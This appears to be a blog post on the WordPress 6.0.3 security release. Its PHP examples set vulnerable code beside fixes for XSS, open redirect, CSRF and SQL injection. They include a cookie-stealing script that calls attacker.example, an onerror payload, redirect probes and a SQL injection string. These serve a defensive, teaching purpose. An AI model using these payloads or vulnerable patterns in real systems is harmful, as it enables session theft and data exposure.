WordPress has released WordPress 6.0.3, a security release that fixes 16 vulnerabilities, and is urging site owners to update as soon as possible. The WordPress team has also stated that the fixes have been backported to all versions from WordPress 3.7 onwards, so sites on older release branches receive a point release of their own.
WordPress does not rate the severity of the individual vulnerabilities. Given the types of issues it acknowledges (stored XSS, open redirect, CSRF and SQL injection) and the number of them, it is sensible to treat this release as urgent and update your WordPress site immediately.
WordPress 6.0.3 addresses the following vulnerabilities:
Multiple stored XSS Vulnerabilities
A stored (persistent) XSS vulnerability arises when attacker-supplied input is saved on the site, typically in the database, and later rendered in a page without proper escaping. Because the payload is then served by the site itself, it executes in the browser of everyone who views the affected page, including logged-in administrators, whose session can then be abused. The root cause is usually an input or output point that does not escape or filter HTML and script content before it is displayed.
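The pattern described above, as an added example that is not WordPress core code or part of the original post: a comment record is rendered once exactly as stored and once with output encoding. The sample comment is constructed; plain `htmlspecialchars()` stands in for WordPress's `esc_html()` (or `wp_kses_post()` where limited HTML must survive) so the file runs with a bare PHP interpreter.

```php
<?php
// Added example (not WordPress code): a stored-XSS rendering bug beside its fix.
// Constructed sample data stands in for a comment row read back from the database.
$stored_comment = [
    'author' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'body'   => 'Nice post! <img src=x onerror="alert(1)">',
];

// VULNERABLE: the stored text is concatenated straight into the page, so the browser
// executes the payload in the context of whoever views it (administrators included).
function render_comment_vulnerable(array $c): string
{
    return '<li><b>' . $c['author'] . '</b>: ' . $c['body'] . '</li>';
}

// Hardened: encode on output so stored characters are displayed, never interpreted.
// Inside WordPress use esc_html() for plain text or wp_kses_post() for allowed HTML;
// htmlspecialchars() keeps this example runnable outside WordPress.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_comment_safe(array $c): string
{
    return '<li><b>' . esc($c['author']) . '</b>: ' . esc($c['body']) . '</li>';
}

// Check used below: does the rendered fragment still contain a live tag from the input?
// After encoding, "<script" becomes "&lt;script" and no longer matches.
function contains_live_markup(string $html): bool
{
    return (bool) preg_match('/<(script|img)\b/i', $html);
}

var_dump(contains_live_markup(render_comment_vulnerable($stored_comment)));
var_dump(contains_live_markup(render_comment_safe($stored_comment)));
echo render_comment_safe($stored_comment), "\n";
```

The important point is where the escaping happens: on output, at the moment the value is placed into HTML, rather than only on input, because the same stored value may later be placed into an attribute, a URL or a script context that each need different encoding.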
Open Redirect Vulnerability
An open redirect lets an attacker build a link to the legitimate site that silently forwards the visitor to an attacker-controlled address, lending the trusted domain's credibility to a phishing page. In this case the affected code is the 'Are you sure?' confirmation screen WordPress shows when a security check fails (wp_nonce_ays). WordPress has not outlined the details beyond that; since this screen sits in the middle of sensitive administrative flows, the issue could potentially be serious.
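To show what a redirect target check has to handle, here is an added example that is not WordPress code (WordPress itself uses `wp_validate_redirect()` and `wp_safe_redirect()`): a naive handler that forwards wherever `redirect_to` points, beside a standalone validator run against constructed inputs of the kind an attacker would place in a link. The site host `blog.example` and the fallback path are assumptions.

```php
<?php
// Added example (not WordPress code): validating a user-supplied redirect target.
const SITE_HOST = 'blog.example';   // assumed host of our own site
const FALLBACK  = '/wp-admin/';     // assumed safe destination when the target is rejected

// VULNERABLE: whatever arrives in ?redirect_to= becomes the Location header.
function redirect_target_vulnerable(string $requested): string
{
    return $requested;
}

// Hardened: allow only site-relative paths or absolute http(s) URLs on our own host.
function redirect_target_safe(string $requested): string
{
    $requested = trim($requested);

    // "//evil.example" and "/\evil.example" are read by browsers as a new host,
    // so anything beginning with two slashes (or slash + backslash) is rejected.
    if (preg_match('#^[/\\\\]{2}#', $requested)) {
        return FALLBACK;
    }

    // A plain site-relative path carries no scheme and no authority: safe.
    if ($requested !== '' && $requested[0] === '/') {
        return $requested;
    }

    $parts = parse_url($requested);
    if ($parts === false || empty($parts['host']) || empty($parts['scheme'])) {
        return FALLBACK;   // unparsable input, "javascript:" URLs, bare words
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return FALLBACK;
    }
    if (strcasecmp($parts['host'], SITE_HOST) !== 0) {
        return FALLBACK;   // absolute URL pointing at another host
    }
    return $requested;
}

// Constructed probe inputs: the first two are legitimate, the rest must fall back.
$probes = [
    '/wp-admin/options.php',                // same site, relative
    'https://blog.example/wp-admin/',       // same host, absolute
    'https://evil.example/login',           // off-site
    '//evil.example/login',                 // protocol-relative
    '/\\evil.example',                      // backslash variant
    'javascript:alert(document.domain)',    // non-HTTP scheme
    'https://blog.example@evil.example/',   // userinfo trick: real host is evil.example
];
foreach ($probes as $p) {
    printf("%-40s -> %s\n", $p, redirect_target_safe($p));
}
```

The userinfo case is why the check compares the parsed host rather than looking for the site name anywhere in the string: `https://blog.example@evil.example/` contains the trusted host but sends the browser to `evil.example`.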
Cross-Site Request Forgery
Cross-Site Request Forgery tricks a logged-in administrator's browser into sending a request the administrator never intended, for example by luring them to a page that auto-submits a hidden form to the site. Because the browser attaches the admin's session cookies, the site processes the request as if the admin had made it, which can change settings, create accounts or otherwise compromise the site. WordPress defends against this with nonces that must accompany state-changing requests; a CSRF vulnerability typically means such a check was missing or not enforced.
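The defence described above, as an added example that is not WordPress code: a handler that trusts the session cookie alone beside one that also demands a nonce, with a small HMAC-based nonce scheme similar in shape to WordPress's own (`wp_create_nonce()`, `wp_verify_nonce()`, `check_admin_referer()`). The secret, lifetime, action name and the forged and genuine requests are all constructed for the example.

```php
<?php
// Added example (not WordPress code): why a state-changing request needs a nonce.
const NONCE_SECRET   = 'assumed-server-secret-not-for-production'; // assumption
const NONCE_LIFETIME = 12 * 3600;                                  // 12-hour window

// Issue a token bound to (user, action, time bucket). An attacker's page cannot
// compute it without NONCE_SECRET, and it is not stored in any cookie the browser
// would attach automatically.
function create_nonce(int $user_id, string $action, ?int $now = null): string
{
    $tick = intdiv($now ?? time(), NONCE_LIFETIME);
    return substr(hash_hmac('sha256', "$tick|$action|$user_id", NONCE_SECRET), 0, 16);
}

// Accept the current bucket or the previous one so a form does not expire mid-edit.
function verify_nonce(string $nonce, int $user_id, string $action, ?int $now = null): bool
{
    $now = $now ?? time();
    foreach ([0, NONCE_LIFETIME] as $back) {
        if (hash_equals(create_nonce($user_id, $action, $now - $back), $nonce)) {
            return true;
        }
    }
    return false;
}

// VULNERABLE handler: the session cookie is the only thing checked, so a hidden form
// on an attacker's page that auto-submits here succeeds in the admin's browser.
function add_user_vulnerable(array $request, int $session_user): string
{
    return "created account {$request['login']} on behalf of user $session_user";
}

// Hardened handler: require POST plus a nonce only our own pages could have embedded.
function add_user_safe(array $request, string $method, int $session_user): string
{
    if ($method !== 'POST' || !isset($request['_wpnonce'])
        || !verify_nonce($request['_wpnonce'], $session_user, 'create-user')) {
        return 'rejected: missing or invalid nonce';
    }
    return "created account {$request['login']} on behalf of user $session_user";
}

// Constructed scenario: the forged request carries no nonce; the genuine form embeds
// one generated for this administrator and this action.
$admin_id = 1;
$forged   = ['login' => 'backdoor'];
$genuine  = ['login' => 'editor2', '_wpnonce' => create_nonce($admin_id, 'create-user')];

echo add_user_vulnerable($forged, $admin_id), "\n";
echo add_user_safe($forged, 'POST', $admin_id), "\n";
echo add_user_safe($genuine, 'POST', $admin_id), "\n";
```

`hash_equals()` is used for the comparison so that a wrong nonce takes the same time to reject regardless of how many leading characters happen to match.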
SQL Injection Due to Improper Sanitisation
SQL injection occurs when untrusted input is placed into a database query without being properly escaped or parameterised, so an attacker can alter the structure of the query and read, modify or delete data they should never reach. Sanitisation refers to the checks that neutralise such input before it reaches the query; the more robust fix is a prepared statement, where the input never becomes part of the query text at all. This matters because the WordPress database holds sensitive information such as user accounts and password hashes.
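The difference between splicing input into a query and parameterising it, as an added example that is not WordPress code: the same user lookup written both ways against a constructed in-memory SQLite table (via PDO, so it runs offline). In WordPress the parameterised form is `$wpdb->prepare("... WHERE user_login = %s", $login)`; the table rows and the attacker's payload are made up for the demonstration.

```php
<?php
// Added example (not WordPress code): string-built query versus prepared statement.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)');
// Constructed rows; the hashes are placeholders in the phpass "$P$" format WordPress uses.
$db->exec("INSERT INTO wp_users VALUES (1, 'admin', '\$P\$Bplaceholderhash1'),
                                        (2, 'editor', '\$P\$Bplaceholderhash2')");

// VULNERABLE: the only "sanitisation" is trim(), and the value is spliced into the
// query text, so SQL syntax in the input becomes part of the statement.
function find_user_vulnerable(PDO $db, string $login): array
{
    $login = trim($login);
    $sql = "SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = '$login'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the placeholder fixes the query structure; the driver sends the value
// separately, so it can only ever be compared against user_login.
function find_user_safe(PDO $db, string $login): array
{
    $stmt = $db->prepare('SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = ?');
    $stmt->execute([trim($login)]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the string literal and appends an always-true
// clause, turning a single-user lookup into a dump of every row, hashes included.
$payload = "nobody' OR '1'='1";

echo count(find_user_vulnerable($db, $payload)), " row(s) from the concatenated query\n";
echo count(find_user_safe($db, $payload)), " row(s) from the prepared statement\n";
echo count(find_user_safe($db, 'admin')), " row(s) for a legitimate lookup\n";
```

With the prepared statement the payload is simply a login name nobody has, so the lookup returns nothing; the concatenated version returns every user.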
How might this affect you?
Update your site as soon as possible so it is no longer exposed to these issues. Be aware that if your site has not been updated since before WordPress 6.0, the jump may surface compatibility problems with older themes and plugins. Take a full backup of both the files and the database before updating, and test the update on a staging copy first if you have one.